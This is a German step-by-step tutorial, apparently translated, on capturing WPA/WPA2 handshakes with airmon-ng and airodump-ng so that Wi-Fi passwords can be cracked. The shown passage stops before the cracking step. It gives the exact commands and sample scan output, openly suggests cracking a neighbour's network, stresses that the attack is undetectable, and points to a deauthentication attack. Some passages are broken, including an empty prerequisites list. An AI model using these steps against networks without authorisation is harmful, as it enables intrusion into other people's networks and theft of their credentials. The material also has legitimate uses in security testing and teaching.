
Knacken Sie WPA/WPA2-WLAN-Router mit Airodump-ng und Aircrack-ng/Hashcat
Knacken von WPA/WPA2-Wi-Fi-Routern mit Airodump-ng und Aircrack-ng/Hashcat.
Dies ist eine kurze Schritt-für-Schritt-Anleitung, die zeigt, wie man Wi-Fi-Netzwerke knackt, die mit schwachen Passwörtern gesichert sind. Sie ist nicht vollständig, sollte aber genügend Informationen liefern, um die Sicherheit des eigenen Netzwerks zu testen oder ein benachbartes zu knacken. Der unten beschriebene Angriff ist vollständig passiv (nur Mithören, es wird nichts von Ihrem Computer gesendet) und kann nicht erkannt werden, sofern Sie das geknackte Passwort nicht tatsächlich verwenden. Ein optionaler aktiver Deauthentifizierungsangriff kann verwendet werden, um den Aufklärungsprozess zu beschleunigen und wird am Ende dieses Dokuments beschrieben.
Wenn Sie mit diesem Prozess vertraut sind, können Sie die Beschreibungen überspringen und direkt zur Liste der verwendeten Befehle am Ende springen. Für eine Vielzahl von Vorschlägen und alternativen Methoden siehe den Anhang. neal1991 und tiiime haben ebenfalls freundlicherweise Übersetzungen dieses Dokuments und des Anhangs ins Chinesische zur Verfügung gestellt, falls Sie diese Versionen bevorzugen.
HAFTUNGSAUSSCHLUSS: Diese Software/dieses Tutorial dient ausschließlich zu Bildungszwecken. Sie sollte nicht für illegale Aktivitäten verwendet werden. Der Autor ist nicht verantwortlich für die Nutzung. Seien Sie kein Idiot.
Dieses Tutorial setzt voraus, dass Sie:
sudo apt-get install aircrack-ngBeginnen Sie, indem Sie die drahtlosen Schnittstellen auflisten, die den Monitor-Modus unterstützen, mit:
airmon-ng
Wenn Sie keine aufgeführte Schnittstelle sehen, unterstützt Ihre WLAN-Karte den Monitor-Modus nicht 😞
Wir gehen davon aus, dass der Name Ihrer drahtlosen Schnittstelle wlan0 ist, aber stellen Sie sicher, dass Sie den korrekten Namen verwenden, falls er davon abweicht. Als Nächstes versetzen wir die Schnittstelle in den Monitor-Modus:
airmon-ng start wlan0
Führen Sie iwconfig aus. Sie sollten nun eine neue Monitor-Modus-Schnittstelle sehen (wahrscheinlich mon0 oder wlan0mon).
Beginnen Sie damit, 802.11-Beacon-Frames zu belauschen, die von nahegelegenen WLAN-Routern ausgesendet werden, unter Verwendung Ihrer Monitor-Schnittstelle:
airodump-ng mon0
Sie sollten eine Ausgabe ähnlich der folgenden sehen.
CH 13 ][ Elapsed: 52 s ][ 2017-07-23 15:49
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
14:91:82:F7:52:EB -66 205 26 0 1 54e OPN belkin.2e8.guests
14:91:82:F7:52:E8 -64 212 56 0 1 54e WPA2 CCMP PSK belkin.2e8
14:22:DB:1A:DB:64 -81 44 7 0 1 54 WPA2 CCMP <length: 0>
14:22:DB:1A:DB:66 -83 48 0 0 1 54e. WPA2 CCMP PSK steveserro
9C:5C:8E:C9:AB:C0 -81 19 0 0 3 54e WPA2 CCMP PSK hackme
00:23:69:AD:AF:94 -82 350 4 0 1 54e WPA2 CCMP PSK Kaitlin's Awesome
06:26:BB:75:ED:69 -84 232 0 0 1 54e. WPA2 CCMP PSK HH2
78:71:9C:99:67:D0 -82 339 0 0 1 54e. WPA2 CCMP PSK ARRIS-67D2
9C:34:26:9F:2E:E8 -85 40 0 0 1 54e. WPA2 CCMP PSK Comcast_2EEA-EXT
BC:EE:7B:8F:48:28 -85 119 10 0 1 54e WPA2 CCMP PSK root
EC:1A:59:36:AD:CA -86 210 28 0 1 54e WPA2 CCMP PSK belkin.dca
Für die Zwecke dieser Demo wählen wir, das Passwort meines Netzwerks "hackme" zu knacken. Merken Sie sich die BSSID-MAC-Adresse und die Kanalnummer (CH), wie von airodump-ng angezeigt, da wir beide für den nächsten Schritt benötigen.
WPA/WPA2 verwendet einen 4-Wege-Handshake, um Geräte im Netzwerk zu authentifizieren. Sie müssen nichts darüber wissen, aber Sie müssen einen dieser Handshakes erfassen, um das Netzwerkpasswort zu knacken. Diese Handshakes treten immer dann auf, wenn ein Gerät eine Verbindung zum Netzwerk herstellt, zum Beispiel wenn Ihr Nachbar von der Arbeit nach Hause kommt. Wir erfassen diesen Handshake, indem wir airodump-ng anweisen, den Datenverkehr im Zielnetzwerk zu überwachen, unter Verwendung der Kanal- und BSSID-Werte, die mit dem vorherigen Befehl ermittelt wurden.
# Ersetzen Sie -c und --bssid durch die Werte Ihres Zielnetzwerks
# -w gibt das Verzeichnis an, in dem wir die Paketerfassung speichern
airodump-ng -c 3 --bssid 9C:5C:8E:C9:AB:C0 -w . mon0
CH 6 ][ Elapsed: 1 min ][ 2017-07-23 16:09 ]
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
9C:5C:8E:C9:AB:C0 -47 0 140 0 0 6 54e WPA2 CCMP PSK ASUS
Jetzt warten wir... Sobald Sie einen Handshake erfasst haben, sollten Sie etwa [ WPA handshake: bc:d3:c9:ef:d2:67 oben rechts auf dem Bildschirm sehen, direkt rechts von der aktuellen Uhrzeit.
Wenn Sie ungeduldig sind und sich mit einem aktiven Angriff wohlfühlen, können Sie mit dem Zielnetzwerk verbundene Geräte zwingen, sich erneut zu verbinden, indem Sie bösartige Deauthentifizierungspakete an sie senden. Dies führt oft zur Erfassung eines 4-Wege-Handshakes. Siehe den Abschnitt über Deauth-Angriffe weiter unten für Informationen dazu.